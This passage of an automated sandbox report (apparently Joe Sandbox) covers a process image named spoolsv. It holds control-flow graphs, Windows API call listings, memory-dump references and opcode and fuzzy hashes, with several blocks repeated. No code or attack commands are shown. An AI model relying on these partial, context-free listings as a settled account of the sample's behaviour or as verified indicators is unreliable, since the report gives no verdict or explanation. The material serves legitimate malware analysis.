80->81 82 56477e 80->82 83 564780 81->83 82->83 83->76
                                                APIs
                                                • 02DE3A35.KERNEL32(kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000,00400000,00143900,00000000,00000000), ref: 00564700
                                                • 02DE3A1C.KERNEL32(00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000,00400000,00143900,00000000), ref: 00564706
                                                • 02DE3A35.KERNEL32(?,00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000,00400000,00143900), ref: 0056471C
                                                • 02DE398D.KERNEL32(?,?,00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000,00400000), ref: 0056472E
                                                • 02DE3A1C.KERNEL32(00000000,?,?,00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000), ref: 0056475A
                                                • 02DE3A1C.KERNEL32(00000000,00000000,?,00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000), ref: 00564768
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: E398
                                                • String ID: VirtualAlloc$kernel32.dll
                                                • API String ID: 2368018942-2067260499
                                                • Opcode ID: d6793612300842db5e433cdff9f002e11018828605c84afd6d13a6a167414326
                                                • Instruction ID: 8910996fa2440a084c299a82da12af2e7996832243bad71df7333c1e6ec95c12
                                                • Opcode Fuzzy Hash: d6793612300842db5e433cdff9f002e11018828605c84afd6d13a6a167414326
                                                • Instruction Fuzzy Hash: 85518C7660020A9FDB10CF68D985BAA3BB5FF96318F258254F801AB355D370EC61CF61

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 100 4047ce-407aba call 4025e0 105 407ad8 100->105 106 407abc-407ad6 100->106 107 407ae2-407b15 105->107 106->107 110 407b17-407b38 107->110 111 407b3a 107->111 112 407b44-407b75 110->112 111->112 115 407b77-407b98 112->115 116 407b9a 112->116 117 407ba4-407bc4 115->117 116->117 120 407bd3-407be1 117->120 121 407bc6 117->121 122 407be3-407bfd 120->122 123 407bff 120->123 121->120 124 407c09-407c3c 122->124 123->124 127 407c61 124->127 128 407c3e-407c5f 124->128 129 407c6b-407c97 127->129 128->129 132 407c99-407cba 129->132 133 407cbc 129->133 134 407cc6-407cf6 132->134 133->134 138 407cf8-407d19 134->138 139 407d1b 134->139 140 407d25-407d33 138->140 139->140 142 407d51 140->142 143 407d35-407d4f 140->143 144 407d5b-407d8e 142->144 143->144 147 407d90-407db1 144->147 148 407db3 144->148 149 407dbd-407deb 147->149 148->149 152 407e10 149->152 153 407ded-407e0e 149->153 154 407e1a-407e70 152->154 153->154 161 407e76-407e84 154->161 162 407f98-407fa6 154->162 165 407ea2 161->165 166 407e86-407ea0 161->166 163 407fc4 162->163 164 407fa8-407fc2 162->164 167 407fce-408001 163->167 164->167 168 407eac-407edf 165->168 166->168 175 408003-408024 167->175 176 408026 167->176 173 407ee1-407f02 168->173 174 407f04 168->174 177 407f0e-407f3c 173->177 174->177 178 408030-40805e 175->178 176->178 183 407f61 177->183 184 407f3e-407f5f 177->184 185 408060-408081 178->185 186 408083 178->186 188 407f6b-407f93 183->188 184->188 187 40808d-4080b0 185->187 186->187 195 4080b9-408110 call 40ee70 187->195 188->195 203 408112-40812c 195->203 204 40812e 195->204 205 408138-40816b 203->205 204->205 208 408190 205->208 209 40816d-40818e 205->209 210 40819a-4081c8 208->210 209->210 213 4081ca-4081eb 210->213 214 4081ed 210->214 215 4081f7-40885d call 40ee70 * 12 call 4125a0 213->215 214->215 343 4088bb-4088d6 215->343 344 40885f-4088b6 call 418c90 * 2 215->344 348 408979-408994 343->348 349 4088dc-4088f5 call 4125a0 343->349 356 408a32-408c4f call 40ee70 * 6 344->356 348->356 357 40899a-4089b3 call 4125a0 348->357 358 408937-408974 349->358 359 4088f7-408930 call 40fba0 call 415660 349->359 367 4089f5-408a18 357->367 368 4089b5-4089ee call 40fba0 call 415660 357->368 358->356 359->358 374 408a1f-408a25 367->374 368->367 374->356
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: RO$;$MGH+$2$Once$S$~
                                                • API String ID: 0-884499449
                                                • Opcode ID: c8c48e953f3c1df6476fa549682d22ffb03396aa1b281a9dc8438b2c389778a3
                                                • Instruction ID: d8ffa30b5bef139f52c4a73f7c17676408c317d34ff610f7f65341f5a4a4674a
                                                • Opcode Fuzzy Hash: c8c48e953f3c1df6476fa549682d22ffb03396aa1b281a9dc8438b2c389778a3
                                                • Instruction Fuzzy Hash: B2B2FB71900218EFDB14DFA0DD48BEEBBB5FB48305F10816AE206B72A4DB745A85CF59

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 418 4250a4-4250e8 419 4250ea 418->419 420 4250ec-42511e call 424f7c 418->420 419->420 423 425120-425122 420->423 424 425127-42512e 420->424 423->424 425 425124 423->425 426 425130-425133 424->426 427 425138-42513e 424->427 425->424 426->427 428 425143-42514a 427->428 429 425140 427->429 430 425159-42515d 428->430 431 42514c-425153 428->431 429->428 432 425163 call 425034 430->432 433 425310-425323 430->433 431->430 437 425168 432->437 435 425325-425328 433->435 436 42533b-425342 433->436 435->436 438 42532a-425339 435->438 439 425344-425350 call 4251f8 call 425284 436->439 440 425355-425359 436->440 438->436 439->440 441 42535b-425362 440->441 442 425369-425372 call 424fc4 440->442 441->442 444 425364-425366 441->444 451 425374-42537b 442->451 452 42537d-425382 442->452 444->442 451->452 453 4253a0-4253a9 call 424f9c 451->453 452->453 454 425384-425394 call 427300 452->454 459 4253ab 453->459 460 4253ae-4253b2 453->460 454->453 461 425396-425398 454->461 459->460 462 4253b4 call 425254 460->462 463 4253b9-4253bc 460->463 461->453 464 42539a-42539b FreeLibrary 461->464 462->463 466 4253d8-4253e5 463->466 467 4253be-4253c5 463->467 464->453 466->440 468 4253c7 467->468 469 4253cd-4253d3 ExitProcess 467->469 468->469
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 4"B$<"B
                                                • API String ID: 0-2488709930
                                                • Opcode ID: d6edd425fe0c5ab182e6e5038ed70a65a46b0eec0c5a8e1aaebca3ffb2013342
                                                • Instruction ID: 65bcb0f9bbfcf1aa0aff5c5ea0019528e461f84089a416b068b7ddcb0c1446eb
                                                • Opcode Fuzzy Hash: d6edd425fe0c5ab182e6e5038ed70a65a46b0eec0c5a8e1aaebca3ffb2013342
                                                • Instruction Fuzzy Hash: 6E41C570A00A20DFDB24DF68F8487AA7BE0BB18354F94A15FE844C7351D7B99C88DB59

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 418 4250a4-4250e8 419 4250ea 418->419 420 4250ec-42511e call 424f7c 418->420 419->420 423 425120-425122 420->423 424 425127-42512e 420->424 423->424 425 425124 423->425 426 425130-425133 424->426 427 425138-42513e 424->427 425->424 426->427 428 425143-42514a 427->428 429 425140 427->429 430 425159-42515d 428->430 431 42514c-425153 428->431 429->428 432 425163 call 425034 430->432 433 425310-425323 430->433 431->430 437 425168 432->437 435 425325-425328 433->435 436 42533b-425342 433->436 435->436 438 42532a-425339 435->438 439 425344-425350 call 4251f8 call 425284 436->439 440 425355-425359 436->440 438->436 439->440 441 42535b-425362 440->441 442 425369-425372 call 424fc4 440->442 441->442 444 425364-425366 441->444 451 425374-42537b 442->451 452 42537d-425382 442->452 444->442 451->452 453 4253a0-4253a9 call 424f9c 451->453 452->453 454 425384-425394 call 427300 452->454 459 4253ab 453->459 460 4253ae-4253b2 453->460 454->453 461 425396-425398 454->461 459->460 462 4253b4 call 425254 460->462 463 4253b9-4253bc 460->463 461->453 464 42539a-42539b FreeLibrary 461->464 462->463 466 4253d8-4253e5 463->466 467 4253be-4253c5 463->467 464->453 466->440 468 4253c7 467->468 469 4253cd-4253d3 ExitProcess 467->469 468->469
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 4"B$<"B
                                                • API String ID: 0-2488709930
                                                • Opcode ID: d6edd425fe0c5ab182e6e5038ed70a65a46b0eec0c5a8e1aaebca3ffb2013342
                                                • Instruction ID: 65bcb0f9bbfcf1aa0aff5c5ea0019528e461f84089a416b068b7ddcb0c1446eb
                                                • Opcode Fuzzy Hash: d6edd425fe0c5ab182e6e5038ed70a65a46b0eec0c5a8e1aaebca3ffb2013342
                                                • Instruction Fuzzy Hash: 6E41C570A00A20DFDB24DF68F8487AA7BE0BB18354F94A15FE844C7351D7B99C88DB59

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 470 422bd0-422bf3 RtlInitializeCriticalSection 471 422bf5-422bfa RtlEnterCriticalSection 470->471 472 422bff-422c35 call 42244c * 3 LocalAlloc 470->472 471->472 479 422c77-422c8b 472->479 480 422c37 472->480 484 422c97 479->484 485 422c8d-422c92 RtlLeaveCriticalSection 479->485 481 422c3c-422c4e 480->481 481->481 483 422c50-422c70 481->483 483->479 485->484
                                                APIs
                                                • RtlInitializeCriticalSection.NTDLL(0051C5CC), ref: 00422BE7
                                                • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422BFA
                                                • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00422C98,?,00000000,?,004235F6,00000000), ref: 00422C24
                                                • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422C92
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                • String ID:
                                                • API String ID: 730355536-0
                                                • Opcode ID: b491cc64b7a9910419e4ab8d36c53fd1b477c0733fba9c8d54940aed9c6bdc4f
                                                • Instruction ID: 92aa11e2a0a4aba1e81e32eba7e2178d1e8dd4665264a38a8387338d13c7a394
                                                • Opcode Fuzzy Hash: b491cc64b7a9910419e4ab8d36c53fd1b477c0733fba9c8d54940aed9c6bdc4f
                                                • Instruction Fuzzy Hash: AC11E670784320BFE314EF6AE605BAD7FE5E758304F90806AE00097391C6BE6D84DA1D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 470 422bd0-422bf3 RtlInitializeCriticalSection 471 422bf5-422bfa RtlEnterCriticalSection 470->471 472 422bff-422c35 call 42244c * 3 LocalAlloc 470->472 471->472 479 422c77-422c8b 472->479 480 422c37 472->480 484 422c97 479->484 485 422c8d-422c92 RtlLeaveCriticalSection 479->485 481 422c3c-422c4e 480->481 481->481 483 422c50-422c70 481->483 483->479 485->484
                                                APIs
                                                • RtlInitializeCriticalSection.NTDLL(0051C5CC), ref: 00422BE7
                                                • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422BFA
                                                • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00422C98,?,?,?,004235F6), ref: 00422C24
                                                • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422C92
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                • String ID:
                                                • API String ID: 730355536-0
                                                • Opcode ID: b491cc64b7a9910419e4ab8d36c53fd1b477c0733fba9c8d54940aed9c6bdc4f
                                                • Instruction ID: 92aa11e2a0a4aba1e81e32eba7e2178d1e8dd4665264a38a8387338d13c7a394
                                                • Opcode Fuzzy Hash: b491cc64b7a9910419e4ab8d36c53fd1b477c0733fba9c8d54940aed9c6bdc4f
                                                • Instruction Fuzzy Hash: AC11E670784320BFE314EF6AE605BAD7FE5E758304F90806AE00097391C6BE6D84DA1D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 530 425c04-425c06 531 425bc8-425bcc 530->531 532 425c0c-425c11 530->532 533 425bce-425bdb SysFreeString 531->533 534 425bdc 531->534 532->531 535 425c17-425c21 SysReAllocStringLen 532->535 533->534 536 425c27 535->536 537 425b98-4261dc 535->537 539 4261f6 537->539 540 4261de-4261ee SysAllocStringLen 537->540 540->537 541 4261f4 540->541 541->539
                                                APIs
                                                • SysFreeString.OLEAUT32(?), ref: 00425BD6
                                                • SysReAllocStringLen.OLEAUT32(-00000008,"lB,?), ref: 00425C1A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: String$AllocFree
                                                • String ID: "lB
                                                • API String ID: 344208780-2501005195
                                                • Opcode ID: df0683008a577a838ccdc220bd5f6f3581af13251a19c4261ec83605024432ba
                                                • Instruction ID: 1ef83d56cbdf2652bb4066a39517635c9c34684a331697f53fb0bb73bc7ca3e4
                                                • Opcode Fuzzy Hash: df0683008a577a838ccdc220bd5f6f3581af13251a19c4261ec83605024432ba
                                                • Instruction Fuzzy Hash: FAD012B43006216DEE149A25A901A372A7A9FD1722BE9864EB8019A245DA7CAC01962C

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 486 425cbc-425cbe 487 425cc4-425cce SysAllocStringLen 486->487 488 425bc8-425bcc 486->488 491 425cd4-425cde SysFreeString 487->491 492 425b98-4261dc 487->492 489 425bce-425bdb SysFreeString 488->489 490 425bdc 488->490 489->490 494 4261f6 492->494 495 4261de-4261ee SysAllocStringLen 492->495 495->492 496 4261f4 495->496 496->494
                                                APIs
                                                • SysFreeString.OLEAUT32(?), ref: 00425BD6
                                                • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00425CC7
                                                • SysFreeString.OLEAUT32(?), ref: 00425CD9
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: String$Free$Alloc
                                                • String ID:
                                                • API String ID: 986138563-0
                                                • Opcode ID: 5c52406ce0d2c8db834f185b050696e946b88e2200d6a0afff53845239498f34
                                                • Instruction ID: 3eae97abf8ecebea3d74af2ed52a13b421a08b1f32e908a3b18502d36c4b6d2c
                                                • Opcode Fuzzy Hash: 5c52406ce0d2c8db834f185b050696e946b88e2200d6a0afff53845239498f34
                                                • Instruction Fuzzy Hash: 9CE0ECB83016216DEE156F32AD01B372B29AF81711BE5495EF8009A215DA7CAC41662D
                                                APIs
                                                • SysFreeString.OLEAUT32(?), ref: 00425BD6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeString
                                                • String ID: "lB
                                                • API String ID: 3341692771-2501005195
                                                • Opcode ID: 7f1c94e0d7d00539a662d5e416c93b2d65ca24bdfd2f6e8adb07ea5ed58003b8
                                                • Instruction ID: 2e196b39daa8764921be558a5a387240bacd155c0bdd8e0ce52a32d021dcfd8b
                                                • Opcode Fuzzy Hash: 7f1c94e0d7d00539a662d5e416c93b2d65ca24bdfd2f6e8adb07ea5ed58003b8
                                                • Instruction Fuzzy Hash: 60B092B42022106EE6119B21AC40B27362AABC1711FB9898AA8008A128CB7CAC019628

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 497 42342c-42343c 498 423447-42344d 497->498 499 42343e call 422bd0 497->499 501 423459-42346e 498->501 502 42344f-423454 498->502 503 423443-423445 499->503 505 423470-423475 RtlEnterCriticalSection 501->505 506 42347a-423483 501->506 504 4235cf-4235d6 502->504 503->498 503->502 505->506 507 423485 506->507 508 42348a-423490 506->508 507->508 509 423542-423548 508->509 510 423496-42349a 508->510 511 42354a-423557 509->511 512 42359d-42359f call 4232e4 509->512 513 42349f-4234b3 510->513 514 42349c 510->514 516 423566-42359b call 424e24 511->516 517 423559-423561 511->517 522 4235a4-4235bb 512->522 513->509 515 4234b9-4234d6 513->515 514->513 519 4234e6-42350a 515->519 520 4234d8-4234e4 515->520 516->504 517->516 523 42350c-42353d call 424e24 519->523 520->523 526 4235c7 522->526 527 4235bd-4235c2 RtlLeaveCriticalSection 522->527 523->504 527->526
                                                APIs
                                                  • Part of subcall function 00422BD0: RtlInitializeCriticalSection.NTDLL(0051C5CC), ref: 00422BE7
                                                  • Part of subcall function 00422BD0: RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422BFA
                                                  • Part of subcall function 00422BD0: LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00422C98,?,00000000,?,004235F6,00000000), ref: 00422C24
                                                  • Part of subcall function 00422BD0: RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422C92
                                                • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00423475
                                                • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 004235C2
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                • String ID:
                                                • API String ID: 2227675388-0
                                                • Opcode ID: a152c6f849179c42758c856f24fc3218e7e89dae70e758f92901cddfe6e35a0e
                                                • Instruction ID: 598cdeddc025ade9b9916cc483952d390fd687b2127ecc3d21840085fc418226
                                                • Opcode Fuzzy Hash: a152c6f849179c42758c856f24fc3218e7e89dae70e758f92901cddfe6e35a0e
                                                • Instruction Fuzzy Hash: 6F51A0B0B40315EFDB10CF68E9806AEBBF1FB58305F6081AAD40597351D339AA81CF49

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 497 42342c-42343c 498 423447-42344d 497->498 499 42343e call 422bd0 497->499 501 423459-42346e 498->501 502 42344f-423454 498->502 503 423443-423445 499->503 505 423470-423475 RtlEnterCriticalSection 501->505 506 42347a-423483 501->506 504 4235cf-4235d6 502->504 503->498 503->502 505->506 507 423485 506->507 508 42348a-423490 506->508 507->508 509 423542-423548 508->509 510 423496-42349a 508->510 511 42354a-423557 509->511 512 42359d-42359f call 4232e4 509->512 513 42349f-4234b3 510->513 514 42349c 510->514 516 423566-42359b call 424e24 511->516 517 423559-423561 511->517 522 4235a4-4235bb 512->522 513->509 515 4234b9-4234d6 513->515 514->513 519 4234e6-42350a 515->519 520 4234d8-4234e4 515->520 516->504 517->516 523 42350c-42353d call 424e24 519->523 520->523 526 4235c7 522->526 527 4235bd-4235c2 RtlLeaveCriticalSection 522->527 523->504 527->526
                                                APIs
                                                  • Part of subcall function 00422BD0: RtlInitializeCriticalSection.NTDLL(0051C5CC), ref: 00422BE7
                                                  • Part of subcall function 00422BD0: RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422BFA
                                                  • Part of subcall function 00422BD0: LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00422C98,?,?,?,004235F6), ref: 00422C24
                                                  • Part of subcall function 00422BD0: RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422C92
                                                • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00423475
                                                • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 004235C2
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                • String ID:
                                                • API String ID: 2227675388-0
                                                • Opcode ID: a152c6f849179c42758c856f24fc3218e7e89dae70e758f92901cddfe6e35a0e
                                                • Instruction ID: 598cdeddc025ade9b9916cc483952d390fd687b2127ecc3d21840085fc418226
                                                • Opcode Fuzzy Hash: a152c6f849179c42758c856f24fc3218e7e89dae70e758f92901cddfe6e35a0e
                                                • Instruction Fuzzy Hash: 6F51A0B0B40315EFDB10CF68E9806AEBBF1FB58305F6081AAD40597351D339AA81CF49

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 530 425c04-425c06 531 425bc8-425bcc 530->531 532 425c0c-425c11 530->532 533 425bce-425bdb SysFreeString 531->533 534 425bdc 531->534 532->531 535 425c17-425c21 SysReAllocStringLen 532->535 533->534 536 425c27 535->536 537 425b98-4261dc 535->537 539 4261f6 537->539 540 4261de-4261ee SysAllocStringLen 537->540 540->537 541 4261f4 540->541 541->539
                                                APIs
                                                • SysFreeString.OLEAUT32(?), ref: 00425BD6
                                                • SysReAllocStringLen.OLEAUT32(?,?,?), ref: 00425C1A
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: String$AllocFree
                                                • String ID:
                                                • API String ID: 344208780-0
                                                • Opcode ID: df0683008a577a838ccdc220bd5f6f3581af13251a19c4261ec83605024432ba
                                                • Instruction ID: 1ef83d56cbdf2652bb4066a39517635c9c34684a331697f53fb0bb73bc7ca3e4
                                                • Opcode Fuzzy Hash: df0683008a577a838ccdc220bd5f6f3581af13251a19c4261ec83605024432ba
                                                • Instruction Fuzzy Hash: FAD012B43006216DEE149A25A901A372A7A9FD1722BE9864EB8019A245DA7CAC01962C

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 542 415660-41573c 553 415742-415745 542->553 554 415d28-415d2f 542->554 553->554 555 41574b-415777 call 40ee70 553->555 562 4158e3-4158fc 555->562 563 41577d-415810 call 40ee70 555->563 568 4158fd-415909 call 40eab0 562->568 590 4158c7-4158e1 563->590 591 415816-415885 call 40ee70 call 40eab0 563->591 576 415912-415976 568->576 597 41597d-415982 576->597 590->568 591->554 656 41588b-4158a3 591->656 598 415a25-415a65 597->598 599 415988-415992 597->599 616 415a67-415a6e 598->616 599->554 602 415998-41599e 599->602 603 4159a0-4159cc 602->603 604 4159d7-4159d9 602->604 603->554 634 4159d2-4159d5 603->634 604->554 607 4159df-4159e2 604->607 607->554 611 4159e8-415a20 607->611 611->597 618 415b11-415b18 616->618 619 415a74-415a97 616->619 622 415b25-415b2b 618->622 623 415b1a-415b1f call 404c14 618->623 630 415a99-415a9d 619->630 631 415abd 619->631 622->554 627 415b31-415b59 622->627 623->622 627->554 633 415b5f 627->633 630->631 638 415a9f-415aad 630->638 640 415ac3-415ad9 631->640 639 415b66-415b69 633->639 634->597 638->640 641 415aaf-415abb 638->641 642 415b92-415b98 639->642 643 415b6b-415b87 639->643 647 415d23 640->647 648 415adf-415b04 640->648 641->640 642->554 645 415b9e-415bcf 642->645 643->554 659 415b8d-415b90 643->659 645->647 657 415bd5-415bed 645->657 647->554 648->554 660 415b0a-415b0c 648->660 665 4158a5-4158a7 656->665 666 4158a9-4158ae 656->666 667 415bfa-415c2e 657->667 668 415bef-415bf4 call 404c14 657->668 659->639 660->616 665->666 669 4158b1-4158b3 665->669 666->669 667->554 677 415c34-415c37 667->677 668->667 669->554 672 4158b9-4158bc 669->672 672->554 674 4158c2-4158c5 672->674 674->576 677->554 678 415c3d-415d0b 677->678
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
